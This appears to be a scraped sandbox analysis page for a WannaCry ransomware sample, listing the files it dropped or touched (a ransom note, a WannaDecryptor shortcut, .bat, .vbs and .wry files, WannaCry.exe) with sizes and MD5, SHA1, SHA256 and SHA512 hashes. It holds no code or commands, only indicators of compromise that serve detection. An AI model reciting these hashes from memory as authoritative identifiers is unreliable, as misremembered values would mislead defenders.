96e3f09815eece7e2c657ab63815cb4f9a56fd273e8f08e2804f5b0c6b3fa0c55f460925950278c9a67a41b7c46542cc42075f699615c30b971c539fb19d3962

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
27dbd2acf096938cc71ccd1610f2cf8e

SHA1
56aba391d094759c61e150f44aaf2136e1d39af1

SHA256
9d9c5f07e58ec72b3f7d717aaf257c5c3c3e25ae7274a0149762f17f1e0ee440

SHA512
568f6ada5dd83054dd7563480a2574d7fcddca2c7e827312f621a2369b4ecee0187f9d98db582e754b1224f4aec57e45fa36c59009d44925f83e12e1ecb9d32a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
fc193432daa5ee814ecdcab63d8f3acb

SHA1
c1b7f5b4fc6357d4e37df4d2add845888134d0ee

SHA256
aa09f8b18d0e27e39faea445cabee07dfa728acd723130d9e2790fac16160fc0

SHA512
f7869482b815458c8e293658b342ea191d38c6cadfcab402c63b338f852e095de3d1ae1b5f1881e3d502346763c3bda607b665565d3e2626381d47daa9526c97

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
4944a3ebc363637bef48af7827f81b0f

SHA1
52f6362d3b0d972f83c3bea2ce2c7717b960dc4d

SHA256
b417365eafdde9d98c94af44c375bf7946a0b31afaa178a9eb6315e428abe993

SHA512
1a2f8da48c3f929a2503011e57a7d40b7ed987ec4b63db5cd3fc6ab21139300613510224819564f24f0142582a2015878a997f2d11a6b8c4279d25495766a8f2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
69cd205cbc0ed6c2fc6988a7610ff5dd

SHA1
13749613845016bbc80534cd4c3dbfbde16c7561

SHA256
c20141e9bb16e85d3eb2fb81570de7c0115d15493baa9f4f7c87a31a000b0688

SHA512
c620820cc31a61a4eedb69f14e25db3c4cd6b50a0b61d4e159e2f3f41618630d9269aa6e315dc798e9910ebaac416b0c91e0d35aeb03c49fb096dc7cf1df57f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
29093e9786402c1dd621b0e19659377d

SHA1
9fe71a9a7e979aea23ba55c39803e0e0ae1c1e5f

SHA256
11cee938ba4d364b0133c62e31c8132804dc22b26e6c452e5f8216a11e78865a

SHA512
e8aa040afaf956f6f114c7c382be6561ce10ff0204d1bf9d46d1fa130d4cfa4b452012f12c80630782ed8946fcf51d24892fe0fc276aefa362f2ec7a78c9dcd8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
101KB

MD5
e65b3bc26264112cdaed84fd79e3499a

SHA1
2d1eac1e20bf5548267a4bb2b3367d837e4aa83a

SHA256
724a15084cfdda4409a2741d3d4a5b001b0f197beecbd27c66c12675390b4b17

SHA512
e001381cdf18907d54ad2c9b4ce6764f788861aeb72703e2fe55f5623fa89d9a184643afd7295a0a6466091876adcf49d11c722f03924724dffd15b764ef1276

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
101KB

MD5
73edea50aab0ab0e7284a9d256f84559

SHA1
90ccaac0cb8d7bae406eaae4afc890dd8f9667cf

SHA256
4b156ad8860dcd4fa810c5267079a4509b0bb54835ac200a743466f0d18c0f9c

SHA512
5bffebd7764605115387b2332cc92c527b72a20608f51f67564c60452499b0092b2b7083c5d99eb3e202443df89e971ff9f51b6edd936a57a82fe37a6bb22ec4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
101KB

MD5
d68df53dcaa98c1f078b359afb480948

SHA1
c88a0e3886f545888ce3a37534d64c1ad2fb02ed

SHA256
50fce9b626f6a3b1458878063b22b78f3d947b8238654cd9f50571bcae4d524b

SHA512
e23165b61b537ae250266282e3cc2affd50e6ce7e373eec6a4a0a6bca3249cab3680bfe468d1cd2aa67cf32dc686da93f3353cd1a17c98bf28d8e4455cf835e8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
101KB

MD5
de702d87fc8ad4837f60b5a0ca3319a1

SHA1
19d19c1748012be7e9e7356da5ec917ffa039c86

SHA256
c03d1f5d5f78907bc6283078030110c5f8a2f82f8dae4cab36f983876e8564de

SHA512
ce32ca5f507ede45b3ba1d6c454ad8fd02776780081d4cf6ce574156a54d761aaf3f34f02b0e384e24893907abeb40925433d07c5b2fcf1919a5b3ab2621d03e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\first_party_sets.db

Filesize
48KB

MD5
5a1706ef2fb06594e5ec3a3f15fb89e2

SHA1
983042bba239018b3dced4b56491a90d38ba084a

SHA256
87d62d8837ef9e6ab288f75f207ffa761e90a626a115a0b811ae6357bb7a59dd

SHA512
c56a8b94d62b12af6bd86f392faa7c3b9f257bd2fad69c5fa2d5e6345640fe4576fac629ed070b65ebce237759d30da0c0a62a8a21a0b5ef6b09581d91d0aa16

Download Submit
C:\Users\Admin\Downloads\!Please Read Me!.txt

Filesize
797B

MD5
afa18cf4aa2660392111763fb93a8c3d

SHA1
c219a3654a5f41ce535a09f2a188a464c3f5baf5

SHA256
227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

SHA512
4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

Download Submit
C:\Users\Admin\Downloads\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
62e98250cd780950856cf86a09739e12

SHA1
2207579c33a0e4253a70957b5d72ecb1ae9aeb61

SHA256
01541316a734430fc2bfeeead693e3a6ea75ec497f167bee463f201e3c474af4

SHA512
035d35506d6022f247c790789e73efcd65bd4527bfb7f706b6810e4cd0fa009ca881655da6f254414d87d8156f5d2e946d0a3ca011f43e455792ced042d83564

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
a64fcffb03ca5d2b4f51b7a0423c693d

SHA1
3ad92fcd667668b248b8117855064d91d4e1e4a6

SHA256
fddc9deb04d026293745eb5b77ab14c595bbdd6935eb0c7ff22bff024ff43ced

SHA512
d012e4a47ad005faea6779cb9b791dca94efeeecbcb55b610ce7dc2c34efc7bc364fd1b6a48949acbeaeb6b6e44d3a11c5fd27e4e0e1ad069db2b0d18fd2891b

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
ddeb04af2cd7b65e92d4d24027f48d19

SHA1
97034d923a3df9fbdf795a5113d1db880366d639

SHA256
32e33f50007c578777c86d122a3e0adcb76316fddc1fd01111b6e0e890d88d12

SHA512
f70f8fd40c349ce1070cb5edc451d125879056315e030c94cb0a7ead0d43db847cfdb419c869fd8f555a62a14fa02fce15dae4a867027e50297649ae312269ac

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
c187aff534ec801c7ac4124274c500be

SHA1
0ed1ed2e20a91ab36801eaf4b9b2364547ae4f80

SHA256
79136e4e0e9704f8ec3ef6cefcc8a4abe6827061c0a165eed042091fe0c978a8

SHA512
3604410264132b187489aad29218752177e8ca745ea3a1ce6f912e59c201acd3d29f2997c9f224a4ce7fe66d5c3e18dbcee49f63d588299bc9e02dd5b000a68e

Download Submit
C:\Users\Admin\Downloads\298081724078046.bat

Filesize
318B

MD5
a261428b490a45438c0d55781a9c6e75

SHA1
e9eefce11cefcbb7e5168bfb8de8a3c3ac45c41e

SHA256
4288d655b7de7537d7ea13fdeb1ba19760bcaf04384cd68619d9e5edb5e31f44

SHA512
304887938520ffcc6966da83596ccc8688b7eace9572982c224f3fb9c59e6fb2dcaa021a19d2aae47346e954c0d0d8145c723b7143dece11ac7261dc41ba3d40

Download Submit
C:\Users\Admin\Downloads\WannaCry.exe

Filesize
224KB

MD5
5c7fb0927db37372da25f270708103a2

SHA1
120ed9279d85cbfa56e5b7779ffa7162074f7a29

SHA256
be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

SHA512
a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

Download Submit
C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\c.vbs

Filesize
201B

MD5
02b937ceef5da308c5689fcdb3fb12e9

SHA1
fa5490ea513c1b0ee01038c18cb641a51f459507

SHA256
5d57b86aeb52be824875008a6444daf919717408ec45aff4640b5e64610666f1

SHA512
843eeae13ac5fdc216b14e40534543c283ecb2b6c31503aba2d25ddd215df19105892e43cf618848742de9c13687d21e8c834eff3f2b69a26df2509a6f992653

Download Submit
C:\Users\Admin\Downloads\c.wry

Filesize
628B

MD5
bd6ce57a8658d065e73a8fbbc19a1980

SHA1
7a135edc7361a315c5ea078bb9238998354907cc

SHA256
ad25645b53725fcf520a0796ee15684fbb5c51c18e7ac67368913d42c1692cf2

SHA512
4897f5e626c4db7365fa90cd1cc39e9572b3042e90d4d9d1b1daca4c025e1969024def04b755e7ee847ca134730d9ff1e6cae3642a0cfe5ce03be961f87bd580

Download Submit
C:\Users\Admin\Downloads\m.wry

Filesize
42KB

MD5
980b08bac152aff3f9b0136b616affa5

SHA1
2a9c9601ea038f790cc29379c79407356a3d25a3

SHA256
402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9

SHA512
100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

Download Submit
C:\Users\Admin\Downloads\u.wry

Filesize
236KB

MD5
cf1416074cd7791ab80a18f9e7e219d9

SHA1
276d2ec82c518d887a8a3608e51c56fa28716ded

SHA256
78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

SHA512
0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

Download Submit
memory/4708-236-0x0000000010000000-0x0000000010012000-memory.dmp

Filesize
72KB

Download